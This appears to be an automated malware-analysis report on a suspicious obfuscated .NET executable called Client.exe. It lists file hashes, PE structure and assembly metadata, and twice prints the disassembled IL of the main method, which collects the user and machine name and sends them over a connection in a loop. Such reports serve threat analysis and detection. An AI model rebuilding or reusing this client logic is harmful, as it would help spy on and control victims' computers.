Suspicious
Suspect

456f2588e7790fb14fb0fd0ae9f0ac3c

PE Executable
|
MD5: 456f2588e7790fb14fb0fd0ae9f0ac3c
|
Size: 326.66 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
456f2588e7790fb14fb0fd0ae9f0ac3c
Sha1
aead464ad6f544d4460d08edfa992719c67077bc
Sha256
3c5a05002285a08e318b47a50023a8a784c94333a423d73d12178391624f395b
Sha384
0983dd2e2cc06031520f83e3ea0338c04de4ab54d47ff58a0f6211816d9eb266cb895f168d902769de31196619eabe11
Sha512
23c46901b1145ee040c8c4b418e8c69dee2281221456ffe462156ea8b0d0913ed94c1ca3ee87771799dc80aa463837b20d6989ed771a8e30985acd3c8e575145
SSDeep
6144:afKjtV1n+geKyiVdePt38rueUmg6fxKYskqbxPf5xP:EOtV1nzyYgI8YCP
TLSH
746484257FA58E10D481287ECA7F3609CB16E0F125026347370AFAA15D05ADEEE6D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
456f2588e7790fb14fb0fd0ae9f0ac3c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yxz5h0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

455
Main Method

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TWryEESvWJpaI() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LIducvdXgOOkIlwda() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::qezRvPIhPfDcXWNqkCoTgxh() stloc V_3 nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pcjUvhysjwjdYuMNlvfxUErs() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() br IL_000E: nop call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() call System.Void TvoOCZGzbqwmHIV.qlonCRfSGqhxQXThrtCHmlGi::WvaMUZbtwDjQWZnycoQ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::kiDZEwunFmylAy call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::IQHvlaMayVxTvOzenyOjDyO() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Void rExlEpgfMJQln.HsTkcRLdzLyVXkUpiF::uuleILxWyGlUdKqmpDvyWjBE() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Boolean aHXcrjnXXJpLxIfl.OjRjFrHCdbtKqXnQubazHdX::bNRgiXZoMnmlRUkSvFqcRaUI(System.String) brtrue IL_0080: call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() leave IL_0283: ret call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() call System.Void vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::sHlWnhuIKmdU() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brtrue IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::ktETYFCFkTUyR call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::SAtpGMswDbSfomihK() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::bmjRqqahkSkbklrxcgEDcjq() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::USuixIxQKLQFnAKDOYba() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::crhoqJCcGQrvC() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvskcUURZVlKbWApEIQUsbNtG() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vnDuYJkElHWnzFsLRLCgifbRM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fiExiyedZhNfwcZXksSQ() ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::KcgJBqZQPLlh() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::eCzoZXJWfKxmOaHKuizwaU() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::XngHEMKVcxH() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::lowYAvvCHc() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::WXwTuGmfRiXnPSGUcmlOJwcBs() ldelem System.String ldloc V_2 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::jMMXakFvHMoSB(System.String,System.String) ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brfalse IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::KLVTBNewKFxyn ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::hylDTFqgQkPoXTrd ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::FJVpVoHckmyPEp() newarr System.Object dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pooPtslGpspMsoZvubeAcJ() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::CIEohmYOShKbcPatVKoycrPc() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::NjgmiTVNhvaUInmyXU() call System.Byte[] vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::ZwlxNhRXKFPsYXNTbFhkpN() stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::gwfbOoKqEnZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MHFgjQDvjHQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LfMbfNFDnTfIRRURIIdGgZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::vMpLGColhMOLGxjkKapl stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fhHRyXcRaIGPowMGkSQ() call System.String System.Environment::get_UserName() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::hVjXBoKBNtdVYt() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::MRXKwUtiwKSImBg() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::amwUKZkrwAQTryMdllovMLCv stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvHfKCFzKCfUwBsoQIROKwUd() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::nWYDggJrFlslEjcntgFyNUZQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::tVPpycmPSioLlFJMXAu() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MYlJhPkAZWCMn stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YmuSesdkSjbbdBRhpJMasF() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fWZBOknCrDEFvvL stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TDcfDHCmwapFHbxLFyC() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::THclMTshBLISew stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::jGNijocWOnTwTIaOBNacQxeA() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::OiDxEkQOfHLKsedFKiJ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vJFsyGbqIuNpuvPefYJGtm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fJlVinJWUKUaHpWXlLdioTBWb stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::AiKsYZfmbNuneXePgsFKNNZGR() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::uUUuUGZlPDEqXOfPNCulzHMM stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::ylYVtvJJFJnND() call System.String vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::PiaoimYhGFUbxzEuskhngWJC() stelem.ref <null> call System.Byte[] GdRRjytEVi.kUdaaiUbrNX::ByinMbDWLTjKqGAQUy(System.Object[]) callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::fmyQajTAEfcWbdwPOAPg(System.Byte[]) call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

455
Main Method

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TWryEESvWJpaI() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LIducvdXgOOkIlwda() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::qezRvPIhPfDcXWNqkCoTgxh() stloc V_3 nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pcjUvhysjwjdYuMNlvfxUErs() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() br IL_000E: nop call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() call System.Void TvoOCZGzbqwmHIV.qlonCRfSGqhxQXThrtCHmlGi::WvaMUZbtwDjQWZnycoQ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::kiDZEwunFmylAy call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::IQHvlaMayVxTvOzenyOjDyO() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Void rExlEpgfMJQln.HsTkcRLdzLyVXkUpiF::uuleILxWyGlUdKqmpDvyWjBE() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Boolean aHXcrjnXXJpLxIfl.OjRjFrHCdbtKqXnQubazHdX::bNRgiXZoMnmlRUkSvFqcRaUI(System.String) brtrue IL_0080: call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() leave IL_0283: ret call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() call System.Void vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::sHlWnhuIKmdU() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brtrue IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::ktETYFCFkTUyR call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::SAtpGMswDbSfomihK() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::bmjRqqahkSkbklrxcgEDcjq() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::USuixIxQKLQFnAKDOYba() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::crhoqJCcGQrvC() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvskcUURZVlKbWApEIQUsbNtG() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vnDuYJkElHWnzFsLRLCgifbRM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fiExiyedZhNfwcZXksSQ() ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::KcgJBqZQPLlh() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::eCzoZXJWfKxmOaHKuizwaU() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::XngHEMKVcxH() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::lowYAvvCHc() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::WXwTuGmfRiXnPSGUcmlOJwcBs() ldelem System.String ldloc V_2 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::jMMXakFvHMoSB(System.String,System.String) ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brfalse IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::KLVTBNewKFxyn ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::hylDTFqgQkPoXTrd ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::FJVpVoHckmyPEp() newarr System.Object dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pooPtslGpspMsoZvubeAcJ() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::CIEohmYOShKbcPatVKoycrPc() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::NjgmiTVNhvaUInmyXU() call System.Byte[] vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::ZwlxNhRXKFPsYXNTbFhkpN() stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::gwfbOoKqEnZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MHFgjQDvjHQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LfMbfNFDnTfIRRURIIdGgZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::vMpLGColhMOLGxjkKapl stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fhHRyXcRaIGPowMGkSQ() call System.String System.Environment::get_UserName() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::hVjXBoKBNtdVYt() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::MRXKwUtiwKSImBg() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::amwUKZkrwAQTryMdllovMLCv stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvHfKCFzKCfUwBsoQIROKwUd() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::nWYDggJrFlslEjcntgFyNUZQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::tVPpycmPSioLlFJMXAu() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MYlJhPkAZWCMn stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YmuSesdkSjbbdBRhpJMasF() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fWZBOknCrDEFvvL stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TDcfDHCmwapFHbxLFyC() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::THclMTshBLISew stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::jGNijocWOnTwTIaOBNacQxeA() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::OiDxEkQOfHLKsedFKiJ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vJFsyGbqIuNpuvPefYJGtm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fJlVinJWUKUaHpWXlLdioTBWb stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::AiKsYZfmbNuneXePgsFKNNZGR() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::uUUuUGZlPDEqXOfPNCulzHMM stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::ylYVtvJJFJnND() call System.String vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::PiaoimYhGFUbxzEuskhngWJC() stelem.ref <null> call System.Byte[] GdRRjytEVi.kUdaaiUbrNX::ByinMbDWLTjKqGAQUy(System.Object[]) callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::fmyQajTAEfcWbdwPOAPg(System.Byte[]) call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt pop <null> leave IL_0283: ret ret <null>
456f2588e7790fb14fb0fd0ae9f0ac3c (326.66 KB)
File Structure
456f2588e7790fb14fb0fd0ae9f0ac3c
Structure
DosHeader
PE Header
Optional Header (x86)
